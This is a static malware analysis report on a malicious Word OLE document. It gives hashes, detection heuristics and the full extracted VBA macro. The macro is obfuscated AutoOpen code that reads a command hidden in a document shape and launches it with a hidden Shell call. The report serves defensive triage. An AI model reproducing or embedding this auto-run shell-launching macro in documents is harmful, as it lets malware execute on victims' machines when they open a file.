Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da17ba8063d1d077…

MALICIOUS

Office (OLE)

132.8 KB Created: 2018-12-07 11:39:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: ad302afdc43e6d0651f7d7d98f3448f6 SHA-1: c346aee56b997044363fa82bd3ee5afa120d35a8 SHA-256: da17ba8063d1d0771b86dc7856a514efef200b4ea64bf3ef593549f5dbc4c35f
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Malware.Generic-6777200-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6777200-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    aRjQVA = Array(HNiMu, iQcnlPzP, DVHbnDJWL, Interaction _
.Shell(RIApLSKtj, miDwHrOYKwE), tQWfqD)
         Set QUDnjaXYKuUNWNLnPIUocU = EYuwjwIvFwHLXlnSaQG
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
MVAUJouw
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6831 bytes
SHA-256: e6a0b3f121028cac938f54610c5d898a3b4899d9c9b04c9272c123557fc91fe3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
179 of 215 identifiers look randomly generated (e.g. 'atrjhRoYMqjIOIcjzuWsKCWB') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VQpNBKf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
MVAUJouw
End Sub

Attribute VB_Name = "iQFVvzNW"
Function MVAUJouw()
On Error Resume Next
         Set EvmGKZAltbsFdhwtwQohHS = QaBMsaWMjNwvBKWFmlTOEn
      jPLviFWWilIWfJ = HLXOMrflwjaKBwoE
      cZRwjirGJqTKtnqvZdHqp = JDdPMEuUZqhZuGrQbhf / CLng(53872523) * 18269485 / Tan(5727088) + bCvjPcTjNsBPOTQR - Cos(257284790) + (80273471 / Int(QcdTtkDICaLhYIrCMQUfrG))
         Set OVTXpDRXPjHjGNaPPZRo = CElJZvkYSiOLZmwMZUOsOkLS
      kzrWvwqQhMRiOPIhwzBs = jbiCpFCvhRtSfozsCX
      YvsaiiLEFKQnKaIEWNUFt = UzvYQjbLowaRUZnBzYiAwk / CLng(114648272) * 195741114 / Tan(232123615) + WkbfhRpkatfGNbduWUNsGjQ - Cos(138122543) + (87948741 / Int(atrjhRoYMqjIOIcjzuWsKCWB))
         Set RvddCJlIsrlGZXmTncH = FBknYcKovZrHZh
      aVizKKrUGVjwTVl = YVMUPLpEawzMSzdjrQMzEiws
      hdRpiqSKaTmMNrPfi = MNiBGsCGDJnttZUFih / CLng(162253773) * 98143917 / Tan(316592792) + iBrfrTdYwRaHkfk - Cos(212389453) + (151689192 / Int(mXnJWhaMsIJiHPbDicJ))
         Set zzTYDVbMUBpQiXd = jjaoqtRjowUtpWZWYVsdwI
      oHwGTwSHdNYrhdJREijjFA = WzcSrNiAoatmhumwkVrqj
      frtPDovOZhnZZJqja = wNjRoqcWRjwNNJAFSlZcKqF / CLng(170089636) * 8313466 / Tan(81659127) + HVdHEvzsThNDCmjWLQLTdYTr - Cos(35619262) + (42562938 / Int(jIHJQbrVBncuSQRhYEhXpdTt))
         Set nHXHnCiNzwWVHI = zLIFIrNfObYiNYiwP
      WiHrDXiwjJYZCvl = zpFkPNZcJjOXVoTCGPlaHGI
      aKHEHpYctUZoqfrJIfhWI = cuqVSnKLlshUJFF / CLng(138905047) * 138056377 / Tan(130500070) + liAPiLbXbRbYlcU - Cos(221532315) + (84380909 / Int(lXkShjjHWWmEnKNO))
         Set IqGziOnGvzXXsoiihIaWAf = vjRXlIEDMdtNwtCvhj
      lYcjNXtTDBNaodUKTNrCwrtL = wbiliNsnEtzTwDAroABzCFj
      ijhpjzuiQpPvKiYoUnj = XrWKrKKqsLrtrHCufDGHz / CLng(125210965) * 16633098 / Tan(42255968) + EjGcNfOVzErMXwWnDmFwWE - Cos(23876104) + (207437518 / Int(IRhblEoQWmdDOijcXrDL))
Set bfMKqPi = VQpNBKf.Shapes(JUwroXsHj + "tFjZfowUiKwQWS" + XTzRiXoEl).TextFrame
         Set MDnHUOcomzoZKSaPjJAb = PimlplWvJGUEZpOAq
      jQiLdDuDMWitbbLOzYBWi = GsdqTUkdMPsYTLlDBjrm
      zRPftsKspzTGDKlinjZ = iKPBCIAdtXRfsDGbOK / CLng(175066885) * 184002146 / Tan(171007190) + WPZSPAzVNzRTrpBOdlshw - Cos(118411255) + (218852605 / Int(NADKUcIzsznzbksziXJSNZ))
         Set iXarWQGopRuiBdYH = sNYRjrASpuDpOqaXM
      izJfUkPETETZjrqvfaItzjZZ = VDwbbTLpiqIGMsoCbXvw
      LLwSKzOSBBZkwzjQd = kIjEBipSiUrVIdbQJsAIRTw / CLng(151501819) * 195734902 / Tan(265615178) + VNsHmwjKpjGJPdrRuaftw - Cos(59307397) + (227342404 / Int(oQUaRLMbNATFpMFXcSljDi))
         Set rVMKXXLzptfCOvkL = uqXWhDlsmwAZSBo
      UTacLOGATCQtjhWavC = MLoJSaRlaKYWrrjtbJ
      ufjXCinrJEaadPjbHjJIC = djpvjYCznuQMIpcolifjHjA / CLng(240329053) * 305235907 / Tan(44253822) + PbNSBjACDhHwOoJQ - Cos(207879507) + (62201248 / Int(HqzTuicSmzjFAZMmY))
         Set YlUWnaVbqiIpjQMqp = fVDCiCCMpnlNuFQ
      OULSMnmolnERtVhtERtlL = HSTbliqckDYwCrfWsr
      PRqzlTTFrJcMfYsNszlCE = IDBtzSqOhYBCwEQVhHRdwTHr / CLng(294589975) * 159158910 / Tan(65585220) + mXHpiQImwsWAPdbEKdbo - Cos(319624194) + (156474401 / Int(dkbzpwJAYILbKRMXf))
RIApLSKtj = bfMKqPi.ContainingRange + FPzoBlr + zhpjsmF + tCBmtss + PYNowr + pWYbu + TNAKiRrf + IPanolk + wTKRa + jvOPpN + jqXFa + ojoWWLH
         Set htfOORZBtUAhESiiYQCu = ZrPkMoSccXBMtW
      qlkGViCJmMKBub = ukjiHBQdCcGYRzwULw
      rmjwZTWidYBnYBFdRfO = AaHidOKlLnrzESkkN / CLng(263089420) * 51921844 / Tan(76589156) + TmEApiXMUhpwibRfzSKIl - Cos(152276132) + (274301135 / Int(CiFRUPdXCdhnChnjnZrG))
         Set ShsKKCSTCvnsLd = WfCLsJfSGPaIZv
      YtrOHiLmEjIrBtiikmDzKJ = trmPmvjtsYPXuBwVZ
      swfjSdYckqVWvcOd = XUPZqUmPTmWkdnRdoRLlJZIq / CLng(67753135) * 69339075 / Tan(294509910) + WcmIQDZAKlBdsUwrBsH - Cos(21645477) + (25974766 / Int(GLDsowLYPjbOtqzOTZOQSDP))
         Set pTrXdzwTatOfZrZsvm = ZnXGQXzaVbhifZGOAv
      zADKvKHDUflcrmrjjS = bAiZcrtKiGSdYwYo
      WcbwIUiujzpvoqavnU = SaaTCzZwCCMfSwWMDr / CLng(113744723) * 123068859 / Tan(210484288) + itsDOuPshlcCWt - Cos(313561437) + (61259970 / Int(wjXbsWTXzRdWEVBqRwh))
         Set rPnaWpjpUhsYSDkwCrRzB = JzNDDZUDzrKumNR
      WjDMOirJTKPOwlzFi = FoMTlGURhBOXQWjnVitpqa
      EjtJGGOuELAHdBD = zrwAquvushIQOLtvfjIjswOK / CLng(127911308) * 42939518 / Tan(66754889) + PODlRkwztZRJnwRY - Cos(328286228) + (331378752 / Int(tSFczsTEAdmhjkjidiWw))
         Set fjijftojSMLEHw = SlsmcHXmvtMYasSNGkJrLNX
      FfwwpirwTIsYcjhzHwmq = VOozzETzGfFNLhzKbz
      CQERzukXDMkOahMj = IwqiXwNcnKQCkmjzZ / CLng(263207300) * 20812565 / Tan(115849743) + oFPhQkVQifwzjCfHjfRqoMjT - Cos(136026693) + (125845625 / Int(EPBtJSTTqawGNrMIfRE))
         Set hhmCkJRwodzqTi = QOtzuOHdFvrubHnzhzamis
      upuPKlzSGQoVcljmoaDh = sPqqAfSstvJXhwJ
      zzrFcldmmLLwLl = aLYBaDZJFhaMUfzu / CLng(255727027) * 168051385 / Tan(250047386) + dMbiGlDDoTThIiiMIzjwZn - Cos(249718005) + (160346726 / Int(ZIHpRZYZvjOjuu))
Const miDwHrOYKwE = 0
         Set bqzDZqzoariXiiEpDuMoYsmZ = poFMFBLWQzccptiQ
      ijninUAYwIqjaiDXskCscUq = ARibMNBiYhNFmcCUEn
      sUmqRYFwJjYOKqQh = pZLiHMLtUwlQhhnoKz / CLng(15190249) * 95632259 / Tan(182906478) + CHRrzASDOVuhffbb - Cos(243260388) + (53488584 / Int(zwaTjbwkZztOTtbWEQQ))
         Set jICZLfscZqBLLDkicjYR = zhVOdRBRoBqUADPAYRXLZqZ
      rLIApOfUCmmbhLhOrLkoKr = zUhDOAGTGHhWRIAb
      VWSNQoTNjJTOGkdAAIj = LQTvTfTAoPFrjKT / CLng(265714001) * 165181594 / Tan(327287747) + fOqfqnEAWDWRATTOECWuk - Cos(138502362) + (123649514 / Int(TDcivRpbCZAtVldIOfw))
aRjQVA = Array(HNiMu, iQcnlPzP, DVHbnDJWL, Interaction _
.Shell(RIApLSKtj, miDwHrOYKwE), tQWfqD)
         Set QUDnjaXYKuUNWNLnPIUocU = EYuwjwIvFwHLXlnSaQG
      oAVXtAjzOdSKwuz = odrZBzORPBoBbqtYV
      lDDWDjPIjcdzOcmYd = ZjEpmEIrMhYYjuoiJvLRaKKs / CLng(122258163) * 246832765 / Tan(257732651) + mLOCMwwpKvRwOMUhk - Cos(54542805) + (298930647 / Int(JjSrMMXOVLXARqEATVMnw))
         Set vfMNLiZqNffGWPs = lRwzoKqrQMcuLHUqI
      SjjsafjOzUdCBcLw = vjBTlpVzzCifFKpzKz
      isqSOZKWOOKAjMk = HHsjuOvbdEitJnEqiCU / CLng(198446513) * 33725157 / Tan(109447297) + tbSGioCvSVliqSQOQzPpJr - Cos(109531901) + (82047734 / Int(JUVhsGUqUwFbHMmaJQY))
         Set XRCTJhwnBMvnuCP = kTTauXCFCVbobvzVnp
      cJdhLMfjInkEKQsMEQO = zOwRnFJMFNazFdmK
      mHNPruSSRRXijvE = bZOMLtGCTauMkwhiiES / CLng(59841797) * 4138916 / Tan(334115923) + UizWomdWSWadEYw - Cos(313111855) + (294093644 / Int(LwQzFhSjsAicvY))
         Set cuQNwfVtpTJHZIjFL = IzaZVwoGjksXXBRT
      pJaHGLtzTmRTGZZ = RMrrDYSYpvlBRvI
      FzrwkEBnhZCMXncLSOFoac = QqBRLasiXibNHhd / CLng(155209264) * 82990786 / Tan(71866917) + JiWGBCTaiCqTPd - Cos(302441747) + (181447883 / Int(jnqNpriiwZVdort))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.